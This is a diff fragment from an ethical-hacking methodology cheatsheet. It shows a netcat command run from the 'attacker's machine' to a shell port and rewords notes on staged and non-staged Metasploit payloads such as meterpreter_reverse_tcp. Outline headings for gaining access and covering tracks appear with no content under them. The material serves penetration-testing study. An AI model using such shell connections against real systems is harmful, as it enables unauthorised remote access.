dacoloma/Cheatsheets/Ethical_Hacker_Methodology.md

 # Attacker's machine
 nc 192.168.156.2 4444
 ```
-### Staged and Non-staged payload
+### Non-staged and Staged payload
+#### Non-staged payload
-Non-staged payload sends a shellcode all at once.
-It's larger than staged payload and doe
+Sends a shellcode all at once.
+It's larger than staged payload and does not always work.
+You can recognize it in Metasploit like this: `windows/meterpreter_reverse_tcp`
+#### Staged payload
+Sends
 ## Gaining Access
 ## Maintaining Access
 ## Covering Tracks